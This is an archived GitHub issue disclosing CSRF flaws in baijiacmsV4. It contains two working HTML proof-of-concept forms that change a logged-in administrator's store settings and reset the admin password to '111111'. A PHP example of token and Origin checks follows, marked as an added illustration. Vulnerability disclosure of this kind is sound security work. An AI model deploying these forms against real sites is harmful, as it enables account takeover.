This repository has been archived by the owner on Jul 21, 2022. It is now read-only.

There is a CSRF vulnerability #7

Open
e11usion opened this issue May 17, 2021 · 0 comments

e11usion commented May 17, 2021

Vulnerability description

A CSRF vulnerability was discovered in baijiacmsV4.
There is a CSRF attack vulnerability. After the administrator has logged in, if they open the following two pages, an attacker can modify the store information and the login password.
1. Modify the store information.
PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.0.0.128/index.php?mod=site&op=post&id=2&act=manager&do=store" method="POST">
      <input type="hidden" name="id" value="2" />
      <input type="hidden" name="sname" value="xxx" />
      <input type="hidden" name="website" value="xxx" />
      <input type="hidden" name="fullwebsite" value="http&#58;&#47;&#47;xxx&#47;" />
      <input type="hidden" name="status" value="1&apos;" />
      <input type="hidden" name="mobile&#95;url" value="http&#58;&#47;&#47;xxx&#47;index&#46;php" />
      <input type="hidden" name="mobile&#95;url" value="http&#58;&#47;&#47;xxx&#47;admin&#46;php" />
      <input type="hidden" name="submit" value="提交" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Original store information (screenshot)

When a logged-in administrator opens the malicious web page and clicks the button (screenshot)

And the store information has changed (screenshot)

2. Modify the login password.
PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.0.0.128/index.php?mod=site&op=changepwd&id=1&act=manager&do=user" method="POST">
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="newpassword" value="111111" />
      <input type="hidden" name="confirmpassword" value="111111" />
      <input type="hidden" name="submit" value="提交" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

When a logged-in administrator opens the malicious web page and clicks the button (screenshot)

And the login password of the administrator will be 111111.

@e11usion e11usion changed the title There is a stored CSRF vulnerability There is a CSRF vulnerability May 17, 2021
@e11usion e11usion reopened this May 25, 2021
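The two PoCs above work because the `do=store` and `op=changepwd` handlers accept any POST that carries the administrator's session cookie. As an added illustration (not baijiacms code; the function names, the `csrf_token` field and the `$expected_host` value are assumptions), this is the synchronizer-token check plus Origin/Referer validation that would make both forms fail when submitted from a foreign page:

```php
<?php
// Added example, not part of baijiacmsV4: CSRF defence for state-changing admin
// actions such as do=store and op=changepwd. Assumes session_start() has already
// run for the logged-in administrator.

function csrf_token(): string {
    // One unguessable token per session, created on first use.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string {
    // Rendered inside every POST form of the admin panel; a cross-site page
    // cannot read this value, so it cannot include it in a forged form.
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function csrf_verify(array $post, array $server, string $expected_host): bool {
    // 1. Token must be present and equal to the session copy (constant-time compare).
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || $sent === '' || !hash_equals(csrf_token(), $sent)) {
        return false;
    }
    // 2. Defence in depth: browsers send the attacker's page as Origin (or Referer)
    //    on a cross-site form post, so the host must be our own. For an admin
    //    panel, a missing header is treated as a failure rather than a pass.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = $source !== '' ? parse_url($source, PHP_URL_HOST) : null;
    return is_string($host) && strcasecmp($host, $expected_host) === 0;
}

// Usage at the top of the handler for ...&act=manager&do=store (and op=changepwd).
// The host below is the one from the PoC, used here only as the expected value.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]); // PHP >= 7.3
session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST'
    && !csrf_verify($_POST, $_SERVER, '10.0.0.128')) {
    http_response_code(403);
    exit('request rejected: missing or invalid CSRF token');
}
```

With the `SameSite=Lax` session cookie the browser also withholds the session cookie on the cross-site POST itself, so the token check is the second layer rather than the only one.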